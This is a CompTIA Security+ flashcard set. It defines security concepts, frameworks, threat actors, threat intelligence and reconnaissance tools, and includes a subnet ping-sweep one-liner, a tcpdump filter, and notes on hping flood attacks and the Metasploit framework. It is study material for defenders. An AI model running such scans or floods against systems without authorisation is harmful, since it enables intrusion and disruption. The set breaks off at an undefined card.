Shared Flashcard Set

Details

CompTIA Security +
CompTIA Security +
1300
Computer Networking
Undergraduate 2
02/05/2024

Additional Computer Networking Flashcards

 


 

Cards

Term
Confidentiality 
Definition
 means that certain information should only be known to certain people.
Term
Integrity 
Definition
means that the data is stored and transferred as intended and that modification is only done by authorized sources. 
Term
Availability 
Definition
means that information is accessible to those authorized to view or modify it. 
Term
Non-repudiation
Definition
Non-repudiation means that a subject cannot deny doing something, such as creating, modifying, or sending a resource.
Term
Information security and cybersecurity tasks can be classified as five functions, following the framework developed by the National Institute of Standards and Technology

[image]
Definition

§  Identifydevelop security policies and capabilities. Evaluate risks, threats, and vulnerabilities and recommend security controls to mitigate them.

§  Protectprocure/develop, install, operate, and decommission IT hardware and software assets with security as an embedded requirement of every stage of this operations life cycle.

§  Detectperform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats.

§  Respondidentify, analyze, contain, and eradicate threats to systems and data security.

 

§  Recoverimplement cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks.

Term
security policy  
Definition
A security policy is a formalized statement that defines how security will be implemented within an organization. It describes the means the organization will take to protect the confidentiality, availability, and integrity of sensitive data and resources. It often consists of multiple individual policies.
Term
Chief Security Officer (CSO), or Chief Information Security Officer (CISO)Information and Communications Technology (ICT)
Definition

§  Overall internal responsibility for security might be allocated to a dedicated department, run by a Director of Security, Chief Security Officer (CSO), or Chief Information Security Officer (CISO). Historically, responsibility for security might have been allocated to an existing business unit, such as Information and Communications Technology (ICT) or accounting. 

Term

§Information Systems Security Officer (ISSO).

Definition

Technical and specialist staff have responsibility for implementing, maintaining, and monitoring the policy. Security might be made a core competency of systems and network administrators, or there may be dedicated security administrators. One such job title is Information Systems Security Officer (ISSO).

Term
security operations center (SOC)  
Definition

security operations center (SOC) is a location where security professionals monitor and protect critical information assets across other business functions, such as finance, operations, sales/marketing, and so on. Because SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger corporations, like a government agency or a healthcare company

Term

DevSecOps 

DevSecOps extends the boundary to security specialists and personnel, reflecting the principle that security is a primary consideration at every stage of software development and deployment. This is also known as shift left, meaning that security considerations need to be made during requirements and planning phases, not grafted on at the end. The principle of DevSecOps recognizes this and shows that security expertise must be embedded into any development project. Ancillary to this is the recognition that security operations can be conceived of as software development projects. Security tools can be automated through code. Consequently, security operations need to take on developer expertise to improve detection and monitoring.

Definition

Network operations and use of cloud computing make ever-increasing use of automation through software code. Traditionally, software code would be the responsibility of a programming or development team. Separate development and operations departments or teams can lead to silos, where each team does not work effectively with the other. 

Term

Incident Response

Definition

A dedicated cyber incident response team (CIRT), a computer security incident response team (CSIRT), or a computer emergency response team (CERT), can be used as a single or partnered point-of-contact for the notification of security incidents. This function might be handled by the SOC, or it might be established as an independent business unit.

Term
security control  
Definition
security control is something designed to give a system or data asset the properties of confidentiality, integrity, availability, and non-repudiation
Term
Security controls can be divided into three broad categories, representing the way the control is implemented:

Definition

§  Technicalthe control is implemented as a system (hardware, software, or firmware). For example, firewalls, antivirus software, and OS access control models are technical controls. Technical controls may also be described as logical controls.

§  Operationalthe control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls rather than technical controls.

   

§  Managerialthe control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

Term
Preventive
Definition
the control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Anti-malware software also acts as a preventative control, by blocking processes identified as malicious from executing. Directives and standard operating procedures (SOPs) can be thought of as administrative versions of preventative controls.
Term
Detective
Definition
the control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack. Logs provide one of the best examples of detective-type controls.
Term
Corrective 
Definition

§  the control acts to eliminate or reduce the impact of an intrusion event. A corrective control is used after an attack. A good example is a backup system that can restore data that was damaged during an intrusion. Another example is a patch management system that acts to eliminate the vulnerability exploited during the attack.

Term
Physical 
Definition
controls such as alarms, gateways, locks, lighting, security cameras, and guards that deter and detect access to premises and hardware are often classed separately.
Term
Deterrent 
Definition

the control may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. This could include signs and warnings of legal penalties against trespass or intrusion.

Term
cybersecurity framework (CSF) 
Definition
cybersecurity framework (CSF) is a list of activities and objectives undertaken to mitigate risks. The use of a framework allows an organization to make an objective statement of its current cybersecurity capabilities, identify a target level of capability, and prioritize investments to achieve that target.
Term
International Organization for Standardization (ISO) 27K
Definition

The International Organization for Standardization (ISO) has produced a cybersecurity framework in conjunction with the International Electrotechnical Commission (IEC). The framework was established in 2005 and revised in 2013. Unlike the NIST framework, the ISO 27001 Information Security Management standard must be purchased (https://www.iso.org/standard/27001). ISO 27001 is part of an overall 27000 series of information security standards, also known as 27K. Of these, 27002 classifies security controls, 27017 and 27018 reference cloud security, and 27701 focuses on personal data and privacy.

Term
ISO 31K
Definition

Where ISO 27K is a cybersecurity frameworkISO 31K (iso.org/iso-31000-risk-management.html) is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial, customer service, competition, and legal liability factors. ISO 31K establishes best practices for performing risk assessments.

Term
Cloud Security Alliance (CSA)  
Definition

The not-for-profit organization Cloud Security Alliance (CSA) produces various resources to assist cloud service providers (CSP) in setting up and delivering secure cloud platforms. These resources can also be useful for cloud consumers in evaluating and selecting cloud services.

Term
Security Guidance  
Definition
a best practice summary analyzing the unique challenges of cloud environments and how on-premises controls can be adapted to them.
Term
Enterprise reference architecture  
Definition
best practice methodology and tools for CSPs to use in architecting cloud solutions. The solutions are divided across a number of domains, such as risk management and infrastructure, application, and presentation services.
Term
Cloud controls matrix  
Definition

lists specific controls and assessment guidelines that should be implemented by CSPs. For cloud consumers, the matrix acts as a starting point for cloud contracts and agreements as it provides a baseline level of security competency that the CSP should meet.

Term
Statements on Standards for Attestation Engagements (SSAE)  
Definition
The Statements on Standards for Attestation Engagements (SSAE) are audit specifications developed by the American Institute of Certified Public Accountants (AICPA). These audits are designed to assure consumers that service providers—notably cloud providers, but including any type of hosted or third-party service—meet professional standards
Term
Service Organization Control (SOC2)
Definition
evaluates the internal controls implemented by the service provider to ensure compliance with Trust Services Criteria (TSC) when storing and processing customer data. TSC refers to security, confidentiality, integrity, availability, and privacy properties. A SOC2 Type I report assesses the system design, while a Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted. They should only be shared with the auditor and regulators, and with important partners under non-disclosure agreement (NDA) terms.
Term
Service Organization Control (SOC3)
Definition
a less detailed report certifying compliance with SOC2. SOC3 reports can be freely distributed.
Term

Center for Internet Security (CIS)

Definition

The Center for Internet Security (cisecurity.org) is a not-for-profit organization (founded partly by The SANS Institute). It publishes the well-known "The CIS Critical Security Controls." The CIS-RAM (Risk Assessment Method) can be used to perform an overall evaluation of security posture (learn.cisecurity.org/cis-ram).

CIS also produces benchmarks for different aspects of cybersecurity. For example, there are benchmarks for compliance with IT frameworks and compliance programs, such as PCI DSS, NIST 800-53, SOX, and ISO 27000. There are also product-focused benchmarks, such as for Windows Desktop, Windows Server, macOS, Linux, Cisco, web browsers, web servers, database and email servers, and VMware ESXi. The CIS-CAT (Configuration Access Tool) can be used with automated vulnerability scanners to test compliance against these benchmarks (cisecurity.org/cybersecurity-tools/cis-cat-pro/cis-cat-faq).

Term

Application Servers

Definition

Most application architectures use a client/server model. This means that part of the application is a client software program, installed and run on separate hardware to the server application code. The client interacts with the server over a network. Attacks can therefore be directed at the local client code, at the server application, or at the network channel between them. As well as coding issues, the applications need to take account of platform issues. The client application might be running in a computing host alongside other, potentially malicious, software. Code that runs on the client should not be trusted. The server-side code should implement routines to verify that input conforms to what is expected.

Term

Web Server Applications

Definition

A web application is a particular type of client/server architecture. A web application leverages existing technologies to simplify development. The application uses a generic client (a web browser), and standard network protocols and servers (HTTP/HTTPS). The specific features of the application are developed using code running on the clients and servers. Web applications are also likely to use a multi-tier architecture, where the server part is split between application logic and data storage and retrieval. Modern web applications may use even more distributed architectures, such as microservices and serverless.

Term
Open Web Application Security Project (OWASP) 
Definition

The Open Web Application Security Project (OWASP) is a not-for-profit, online community that publishes several secure application development resources, such as the Top 10 list of the most critical application security risks (owasp.org/www-project-top-ten). OWASP has also developed resources, such as the Zed Attack Proxy and Juice Shop (a deliberately unsecure web application), to help investigate and understand penetration testing and application security issues.

Term
Sarbanes-Oxley Act (SOX)
Definition

In the US, for example, the Sarbanes-Oxley Act (SOX) mandates the implementation of risk assessments, internal controls, and audit procedures.

Term
Computer Security Act (1987
Definition
The Computer Security Act (1987) requires federal agencies to develop security policies for computer systems that process confidential information
Term
Federal Information Security Management Act (FISMA)
Definition

In 2002, the Federal Information Security Management Act (FISMA) was introduced to govern the security of data processed by federal government agencies. 

Term
General Data Protection Regulation (GDPR),
Definition

Fairness and the right to privacy, as enacted by regulations such as the European Union's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without the individual's informed consent, unless there are other overriding considerations, such as public interest or other legal obligations. 

GDPR gives data subjects rights to withdraw consent, and to inspect, amend, or erase data held about them.

 

Term

Payment Card Industry Data Security Standard (PCI DSS)

Definition
Compliance issues can also arise from industry-mandated regulations. For example, the Payment Card Industry Data Security Standard (PCI DSS) defines the safe handling and storage of financial information 
Term
Vulnerability  
Definition

§  Vulnerability is a weakness that could be triggered accidentally or exploited intentionally to cause a security breach. Examples of vulnerabilities include improperly configured or installed hardware or software, delays in applying and testing software and firmware patches, untested software and firmware patches, the misuse of software or communication protocols, poorly designed network architecture, inadequate physical security, insecure password usage, and design flaws in software or operating systems, such as unchecked user input.

Term
Threat  
Definition

§  Threat is the potential for someone or something to exploit a vulnerability and breach security. A threat may be intentional or unintentional. The person or thing that poses the threat is called a threat actor or threat agent. The path or tool used by a malicious threat actor can be referred to as the attack vector.

Term
Risk 
Definition

§  is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability. To assess risk, you identify a vulnerability and then evaluate the likelihood of it being exploited by a threat and the impact that a successful exploit would have.

Term
External threat actor or agent 
Definition

An external threat actor or agent is one that has no account or authorized access to the target system. A malicious external threat must infiltrate the security system using malware and/or social engineering. Note that an external actor may perpetrate an attack remotely or on-premises (by breaking into the company's headquarters, for instance). It is the threat actor that is defined as external, rather than the attack method.

Term
internal (or insider) threat actor 
Definition

Conversely, an internal (or insider) threat actor is one that has been granted permissions on the system. This typically means an employee, but insider threat can also arise from contractors and business partners.

Term

Intent/Motivation 

Definition
Intent describes what an attacker hopes to achieve from the attack, while motivation is the attacker's reason for perpetrating the attack. A malicious threat actor could be motivated by greed, curiosity, or some sort of grievance, for instance. The intent could be to vandalize and disrupt a system or to steal something. Threats can be characterized as structured or unstructured (or targeted versus opportunistic) depending on the degree to which your own organization is targeted specifically.
Term
Capability 
Definition
Capability refers to a threat actor's ability to craft novel exploit techniques and tools.  
Term

Hackers 

Definition
Hacker describes an individual who has the skills to gain access to computer systems through unauthorized or unapproved means. 
Term

black hat 
white hat
gray hat hacker

Definition
. The terms black hat (unauthorized) and white hat (authorized) are used to distinguish these motivations. Of course, between black and white lie some shades of gray. A gray hat hacker (semi-authorized) might try to find vulnerabilities in a product or network without seeking the approval of the owner; but they might not try to exploit any vulnerabilities they find. A gray hat might seek voluntary compensation of some sort (a bug bounty), but will not use an exploit as extortion. A white hat hacker always seeks authorization to perform penetration testing of private and proprietary systems.
Term

Script Kiddies

Definition

script kiddie is someone who uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal other than gaining attention or proving technical abilities.

Term
Hacktivists 
hacktivist group
 
Definition

hacktivist group uses cyber weapons to promote a political agendaHacktivists might attempt to obtain and release confidential information to the public domain, perform denial of service (DoS) attacks, or deface websites. When considering risks, political, media, and financial groups and companies are likely at greater risk from hacktivist groups.

Term
Advanced Persistent Threat (APT) 
Definition
The term Advanced Persistent Threat (APT) was coined to understand the behavior underpinning modern types of cyber adversaries. Rather than think in terms of systems being infected with a virus or Trojan, an APT refers to the ongoing ability of an adversary to compromise network security—to obtain and maintain access—using a variety of tools and techniques.
Term
State actors 
Definition

State actors have been implicated in many attacks, particularly on energy and health network systems. The goals of state actors are primarily espionage and strategic advantage, but it has been known for countries—North Korea being a good example—to target companies purely for commercial gain.

State actors will work at arm's length from the national government, military, or security service that sponsors and protects them, maintaining "plausible deniability." They are likely to pose as independent groups or even as hacktivists. They may wage false flag campaigns that try to implicate other states

Term
criminal syndicate 
competitor-driven espionage 
Definition

 A criminal syndicate can operate across the Internet from different jurisdictions than its victim, increasing the complexity of prosecution. Syndicates will seek any opportunity for criminal profit, but typical activities are financial fraud (both against individuals and companies) and extortion.

Most competitor-driven espionage is thought to be pursued by state actors, but it is not inconceivable that a rogue business might use cyber espionage against its competitors. Such attacks could aim at theft or at disrupting a competitor's business or damaging their reputation. Competitor attacks might be facilitated by employees who have recently changed companies and bring an element of insider knowledge with them.

Term
insider threat 
Definition

An insider threat arises from an actor who has been identified by the organization and granted some sort of access. Within this group of internal threats, you can distinguish insiders with permanent privileges, such as employees, from insiders with temporary privileges, such as contractors and guests.

Term

The Computer Emergency Response Team (CERT) at Carnegie Mellon University's definition of a malicious insider is:

Definition
A current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. 
Term
unintentional or inadvertent insider threat 
Definition

Insider threats can be categorized as unintentional. An unintentional or inadvertent insider threat is a vector for an external actor, or a separate—malicious—internal actor to exploit, rather than a threat actor in its own right. Unintentional threats usually arise from lack of awareness or from carelessness, such as users demonstrating poor password management 

Term
shadow IT
Definition

. Another example of unintentional insider threat is the concept of shadow IT, where users purchase or introduce computer hardware or software to the workplace without the sanction of the IT department and without going through a procurement and security analysis process. The problem of shadow IT is exacerbated by the proliferation of cloud services and mobile devices, which are easy for users to obtain. Shadow IT creates a new unmonitored attack surface for malicious adversaries to exploit.

Term
attack surface  
Definition

The attack surface is all the points at which a malicious threat actor could try to exploit a vulnerability

Term
attack vector  
Definition
An attack vector is the path that a threat actor uses to gain access to a secure system
Term
Direct access 
Definition
this is a type of physical or local attack. The threat actor could exploit an unlocked workstation, use a boot disk to try to install malicious tools, or steal a device, for example.
Term
Removable media
Definition
the attacker conceals malware on a USB thumb drive or memory card and tries to trick employees into connecting the media to a PC, laptop, or smartphone. For some exploits, simply connecting the media may be sufficient to run the malware. In many cases, the attacker may need the employee to open a file in a vulnerable application or run a setup program.
Term
Email
Definition
the attacker sends a malicious file attachment via email, or via any other communications system that allows attachments. The attacker needs to use social engineering techniques to persuade or trick the user into opening the attachment.
Term
Remote and wireless
Definition

the attacker either obtains credentials for a remote access or wireless connection to the network or cracks the security protocols used for authentication. Alternatively, the attacker spoofs a trusted resource, such as an access point, and uses it to perform credential harvesting and then uses the stolen account details to access the network.

Term
Supply chain
Definition
rather than attack the target directly, a threat actor may seek ways to infiltrate it via companies in its supply chain. One high-profile example of this is the Target data breach, which was made via the company's HVAC supplier 
Term
Web and social media
Definition

§  malware may be concealed in files attached to posts or presented as downloads. An attacker may also be able to compromise a site so that it automatically infects vulnerable browser software (a drive-by download). Social media may also be used more subtly, to reinforce a social engineering campaign and drive the adoption of Trojans.

Term
Cloud 
Definition
many companies now run part or all of their network services via Internet-accessible clouds. The attacker only needs to find one account, service, or host with weak credentials to gain access. The attacker is likely to target the accounts used to develop services in the cloud or manage cloud systems. They may also try to attack the cloud service provider (CSP) as a way of accessing the victim system.
Term
Threat research  
Definition
Threat research is a counterintelligence gathering effort in which security companies and researchers attempt to discover the tactics, techniques, and procedures (TTPs) of modern cyber adversaries. 
Term
deep web  
Definition

The deep web is any part of the World Wide Web that is not indexed by a search engine. This includes pages that require registration, pages that block search indexing, unlinked pages, pages using nonstandard DNS, and content encoded in a nonstandard manner. Within the deep web, are areas that are deliberately concealed from "regular" browser access.

Term
Dark net 
Definition

a network established as an overlay to Internet infrastructure by software, such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize usage and prevent a third party from knowing about the existence of the network or analyzing any activity taking place over the network. Onion routing, for instance, uses multiple layers of encryption and relays between nodes to achieve this anonymity.

Term
Dark web
Definition
sites, content, and services accessible only over a dark net. While there are dark web search engines, many sites are hidden from them. Access to a dark web site via its URL is often only available via "word of mouth" bulletin boards.
Term
Behavioral threat research 
Definition
narrative commentary describing examples of attacks and TTPs gathered through primary research sources.
Term
Reputational threat intelligence 
Definition

lists of IP addresses and domains associated with malicious behavior, plus signatures of known file-based malware.

Term
Threat data 
Definition

computer data that can correlate events observed on a customer's own networks and logs with known TTP and threat actor indicators.

Term
security information and event management (SIEM)
 
cyber threat intelligence (CTI)
Definition

Threat data can be packaged as feeds that integrate with a security information and event management (SIEM) platform. These feeds are usually described as cyber threat intelligence (CTI) data. The data on its own is not a complete security solution however. To produce actionable intelligence, the threat data must be correlated with observed data from customer networks. This type of analysis is often powered by artificial intelligence (AI) features of the SIEM.

Term
Closed/proprietary 
Definition

the threat research and CTI data is made available as a paid subscription to a commercial threat intelligence platform. The security solution provider will also make the most valuable research available early to platform subscribers in the form of blogs, white papers, and webinars. Some examples of such platforms include:

Term
Vendor websites— 
Definition
proprietary threat intelligence is not always provided at cost. All types of security, hardware, and software vendors make huge amounts of threat research available via their websites as a general benefit to their customers. One example is Microsoft's Security Intelligence blog
Term
Public/private information-sharing centers 
Definition
in many critical industries, Information Sharing and Analysis Centers (ISACs) have been set up to share threat intelligence and promote best practice (nationalisacs.org/member-isacs). These are sector-specific resources for companies and agencies working in critical industries, such as power supply, financial markets, or aviation. Where there is no coverage by an ISAC, local industry groups and associations may come together to provide mutual support.
Term
Open source intelligence (OSINT)
Definition

§  some companies operate threat intelligence services on an open-source basis, earning income from consultancy rather than directly from the platform or research effort. Some examples include:

Term
Academic journals 
Definition
results from academic researchers and not-for-profit trade bodies and associations, such as the IEEE, are published as papers in journals. Access to these papers is usually subscription-based. One free source is the arXiv preprint repository (arxiv.org/list/cs.CR/recent). Preprints are papers that have not been published or peer reviewed.
Term
tactic, technique, or procedure (TTP)
Definition
tactic, technique, or procedure (TTP) is a generalized statement of adversary behavior. TTPs categorize behaviors in terms of campaign strategy and approach (tactics), generalized attack vectors (techniques), and specific intrusion tools and methods (procedures).
Term
indicator of compromise (IoC) 
Definition

An indicator of compromise (IoC) is a residual sign that an asset or network has been successfully attacked or is continuing to be attacked. Put another way, an IoC is evidence of a TTP.

Term
The following is a list of some IoCs that you may encounter
Definition

§  Unauthorized software and files

§  Suspicious emails

§  Suspicious registry and file system changes

§  Unknown port and protocol usage

§  Excessive bandwidth usage

§  Rogue hardware

§  Service disruption and defacement

 

§  Suspicious or unauthorized account usage

Term

Structured Threat Information eXpression (STIX)

Definition

The Structured Threat Information eXpression (STIX) part of the framework describes standard terminology for IoCs and ways of indicating relationships between them.STIX provides the syntax for describing CTI

Term
Trusted Automated eXchange of Indicator Information (TAXII)
Definition
protocol provides a means for transmitting CTI data between servers and clients

For example, a CTI service provider would maintain a repository of CTI data. Subscribers to the service obtain updates to the data to load into analysis tools over TAXII. This data can be requested by the client (referred to as a collection), or the data can be pushed to subscribers (referred to as a channel).
Term
Automated Indicator Sharing (AIS) 
Definition

Automated Indicator Sharing (AIS) is a service the Cybersecurity and Infrastructure Security Agency (CISA) provides to enable real-time exchange of machine-readable cyber threat indicators and defensive measures between public and private-sector organizations. AIS helps to protect the participants of the service and ultimately reduce the prevalence of cyberattacks.

Automated Indicator Sharing (AIS) is a service offered by the Department of Homeland Security (DHS) for companies to participate in threat intelligence sharing (us-cert.gov/ais). It is especially aimed at ISACs, but private companies can join too. AIS is based on the STIX and TAXII standards and protocols. 

Term
Threat Maps
Definition
threat map is an animated graphic showing the source, target, and type of attacks that have been detected by a CTI platform. The security solutions providers publish such maps showing global attacks on their customers' systems
Term

File/Code Repositories 

Definition
A file/code repository such as virustotal.com holds signatures of known malware code. The code samples derive from live customer systems and (for public repositories) files that have been uploaded by subscribers.
Term

Vulnerability Databases and Vulnerability Feeds
Common Vulnerabilities and Exposures (CVE)

Definition

As well as analyzing adversary tools and behaviors, another source of threat intelligence is identifying vulnerabilities in OS, software application, and firmware code. Security researchers look for vulnerabilities, often for the reward of bug bounties offered by the vendor. Lists of vulnerabilities are stored in databases such as Common Vulnerabilities and Exposures (CVE), operated by Mitre (cve.mitre.org). Information about vulnerabilities is codified as signatures and scanning scripts that can be supplied as feeds to automated vulnerability scanning software.

Term
AI  
Definition
AI is the science of creating machine systems that can simulate or demonstrate a similar general intelligence capability to humans.
Term
footprinting
Topology discovery 
Definition
Topology discovery (or "footprinting") means scanning for hosts, IP ranges, and routes between networks to map out the structure of the target network. 
Term
ipconfig
Definition

§  show the configuration assigned to network interface(s) in Windows, including the hardware or media access control (MAC) address, IPv4 and IPv6 addresses, default gateway, and whether the address is static or assigned by DHCP. If the address is DHCP-assigned, the output also shows the address of the DHCP server that provided the lease.

Term
ifconfig
Definition

§  show the configuration assigned to network interface(s) in Linux.

Term
ping
Definition

probe a host on a particular IP address or host name using Internet Control Message Protocol (ICMP). You can use ping with a simple script to perform a sweep of all the IP addresses in a subnet.§  The following example will scan the 10.1.0.0/24 subnet from a Windows machine:

for /l %i in (1,1,255) do @ping -n 1 -w 100 10.1.0.%i | find /i "reply"

[image]

Term
arp
Definition
display the local machine's Address Resolution Protocol (ARP) cache. The ARP cache shows the MAC address of the interface associated with each IP address the local host has communicated with recently. This can be useful if you are investigating a suspected spoofing attack. For example, a sign of a man-in-the-middle attack is where the MAC address of the default gateway IP listed in the cache is not the legitimate router's MAC address.

Term
route 
Definition
view and configure the host's local routing table. Most end systems use a default route to forward all traffic for remote networks via a gateway router. If the host is not a router, additional entries in the routing table could be suspicious.
Term
tracert 
Definition
uses ICMP probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. tracert is the Windows version of the tool.
Term
traceroute 
Definition
performs route discovery from a Linux host. traceroute uses UDP probes rather than ICMP, by default.
Term
pathping
Definition
provides statistics for latency and packet loss along a route over a longer measuring period. pathping is a Windows tool; the equivalent on Linux is mtr
Term
Simple Network Management Protocol (SNMP).
PORT 161/162 TRAP
Definition

For auditing, there are enterprise suites, such as Microsoft's System Center products. Such suites can be provided with credentials to perform authorized scans and obtain detailed host information via management protocols, such as the Simple Network Management Protocol (SNMP).

Term
IP scanner 
Definition
. An IP scanner performs host discovery and identifies how the hosts are connected together in an internetwork. 
Term
Nmap Security Scanner 

If you want to perform only host discovery, you can use Nmap with the -sn switch (or -sP in earlier versions) to suppress the port scan
Definition
The Nmap Security Scanner (nmap.org) is one of the most popular open-source IP scanners. Nmap can use diverse methods of host discovery, some of which can operate stealthily and serve to defeat security mechanisms such as firewalls and intrusion detection. The tool is open-source software with packages for most versions of Windows, Linux, and macOS. It can be operated with a command line or via a GUI (Zenmap).

The basic syntax of an Nmap command is to get the IP subnet (or IP host address) to scan. When used without switches like this, the default behavior of Nmap is to ping and send a TCP ACK packet to ports 80 and 443 to determine whether a host is present. On a local network segment, Nmap will also perform ARP and ND (Neighbor Discovery) sweeps. If a host is detected, Nmap performs a port scan against that host to determine which services it is running.
Term
service discovery 
Definition

Having identified active IP hosts on the network and gained an idea of the network topology, the next step in network reconnaissance is to work out which operating systems are in use, which network services each host is running, and, if possible, which application software is underpinning those services. This process is described as service discovery. Service discovery can also be used defensively, to probe potential rogue systems and identify the presence of unauthorized network service ports.

Term
TCP SYN (-sS)
Definition
this is a fast technique also referred to as half-open scanning, as the scanning host requests a connection without acknowledging it. The target's response to the scan's SYN packet identifies the port state.
Term
UDP scans (-sU)
Definition
scan UDP ports. As these do not use ACKs, Nmap needs to wait for a response or timeout to determine the port state, so UDP scanning can take a long time. A UDP scan can be combined with a TCP scan.
Term
Port range (-p)
Definition
by default, Nmap scans 1000 commonly used ports, as listed in its configuration file. Use the -p argument to specify a port range.

Term
fingerprinting 
Definition
The detailed analysis of services on a particular host is often called fingerprinting
Term
netstat 
Definition
show the state of TCP/UDP ports on the local machine. The same command is used on both Windows and Linux, though with different options syntax. You can use netstat to check for service misconfigurations (perhaps a host is running a web or FTP server that a user installed without authorization). You may also be able to identify suspect remote connections to services on the local host or from the host to remote IP addresses. If you are attempting to identify malware, the most useful netstat output is to show which process is listening on which ports. 
Term
nslookup/dig 
Definition
query name records for a given domain using a particular DNS resolver. Under Windows (nslookup) or Linux (nslookup/dig). An attacker may test a network to find out if the DNS service is misconfigured. A misconfigured DNS may allow a zone transfer, which will give the attacker the complete records of every host in the domain, revealing a huge amount about the way the network is configured. 
Term

theHarvester 

Definition
theHarvester is a tool for gathering open-source intelligence (OSINT) for a particular domain or company name (github.com/laramies/theHarvester). It works by scanning multiple public data sources to gather emails, names, subdomains, IPs, URLs and other relevant data.
Term

dnsenum 

Definition

While you can use tools such as dig and whois to query name records and hosting details and to check that external DNS services are not leaking too much information, a tool such as dnsenum packages a number of tests into a single query (github.com/fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can try to work out the IP address ranges that are in use.

Term

scanless 

Definition

Port scanning is difficult to conceal from detection systems, unless it is performed slowly and results are gathered over an extended period. Another option is to disguise the source of probes. To that end, scanless is a tool that uses third-party sites (github.com/vesche/scanless). This sort of tool is also useful in a defensive sense, by scanning for ports and services that are open but shouldn't be.

Term
curl 
Definition

curl is a command line client for performing data transfers over many types of protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT requests as part of web application vulnerability testing. curl supports many other data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.

Term

Nessus 

Definition

The list of services and version information that a host is running can be cross-checked against lists of known software vulnerabilities. This type of scanning is usually performed using automated tools. Nessus, produced by Tenable Network Security (tenable.com/products/nessus/nessus-professional), is one of the best-known commercial vulnerability scanners. It is available in on-premises (Nessus Manager) and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed for smaller networks. The product is free to use for home users but paid for on a subscription basis for enterprises. As a previously open-source program, Nessus also supplies the source code for many other scanners. 

Term
Packet analysis  
Definition
refers to deep-down frame-by-frame scrutiny of captured frames.
Term
Protocol analysis  
Definition
means using statistical tools to analyze a sequence of packets, or packet trace.
Term
tcpdump is a command line packet capture utility for Linux 
Definition
The basic syntax of the command is tcpdump -i eth0, where eth0 is the interface to listen on. The utility will then display captured packets until halted manually (Ctrl+C). Frames can be saved to a .pcap file using the -w option. Alternatively, you can open a pcap file using the -r option.
Term
tcpdump is often used with some sort of filter expression to reduce the number of frames that are captured:
Definition

§  Type—filter by hostnetport, or portrange.

§  Direction—filter by source (src) or destination (dst) parameters (hostnetwork, or port).

 

§  Protocol—filter by a named protocol rather than port number (for example, arpicmpipip6tcpudp, and so on).

Filter expressions can be combined by using Boolean operators:

§  and (&&)

§  or (||)

 

§  not (!)

Filter syntax can be made even more detailed by using parentheses to group expressions. A complex filter expression should be enclosed by quotes. For example, the following command filters frames to those with the source IP 10.1.0.100 and destination port 53 or 80:

 

tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"

Term
traffic analysis.  
Definition

A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform traffic analysis. You can either analyze a live capture or open a saved capture (.pcap) file. Protocol analyzers can decode a captured frame to reveal its contents in a readable format. You can choose to view a summary of the frame or choose a more detailed view that provides information on the OSI layer, protocol, function, and data.

Term
Wireshark  
Definition
is an open-source graphical packet capture and analysis utility, with installer packages for most operating systems. Having chosen the interface to listen on, the output is displayed in a three-pane view. The packet list pane shows a scrolling summary of frames. The packet details pane shows expandable fields in the frame currently selected from the packet list. The packet bytes pane shows the raw data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the headers and payloads of hundreds of network protocols.
Term
hping 

hping is an open-source spoofing tool that provides a penetration tester with the ability to craft network packets to exploit vulnerable firewalls and IDSs. hping can perform the following types of test:
Definition

§  Host/port detection and firewall testinglike Nmap, hping can be used to probe IP addresses and TCP/UDP ports for responses.

§  Tracerouteif ICMP is blocked on a local network, hping offers alternative ways of mapping out network routes. hping can use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces.

 

§  Denial of service (DoS)—hping can be used to perform flood-based DoS attacks from randomized source IPs. This can be used in a test environment to determine how well a firewall, IDS, or load balancer responds to such attacks.

Term

tcpreplay 

Definition

As the name suggests, tcpreplay takes previously captured traffic that has been saved to a .pcap file and replays it through a network interface (linux.die.net/man/1/tcpreplay). Optionally, fields in the capture can be changed, such as substituting MAC or IP addresses. tcpreplay is useful for analysis purposes. If you have captured suspect traffic, you can replay it through a monitored network interface to test intrusion detection rules.

Term
remote access trojan (RAT) 
Definition

A remote access trojan (RAT) is malware that gives an adversary the means of remotely accessing the network. From the perspective of security posture assessment, a penetration tester might want to try to establish this sort of connection and attempt to send corporate information over the channel (data exfiltration). If security controls are working properly, this attempt should be defeated (or at least detected). 

Term
exploitation framework  
Definition

An exploitation framework uses the vulnerabilities identified by an automated scanner and launches scripts or software to attempt to deliver matching exploits. This might involve considerable disruption to the target, including service failure, and risk data security.

 

 


The framework comprises a database of exploit code, each targeting a particular CVE
(Common Vulnerabilities and Exposures). The exploit code can be coupled with modular payloads. Depending on the access obtained via the exploit, the payload code may be used to open a command shell, create a user, install software, and so on. The custom exploit module can then be injected into the target system. The framework may also be able to obfuscate the code so that it can be injected past an intrusion detection system or antivirus software.

Term
Metasploit  
Definition

The best-known exploit framework is Metasploit (metasploit.com). The platform is open-source software, now maintained by Rapid7. There is a free framework (command line) community edition with installation packages for Linux and Windows. Rapid7 produces pro and express commercial editions of the framework and it can be closely integrated with the Nexpose vulnerability scanner.

Term
Sn1per  
Definition
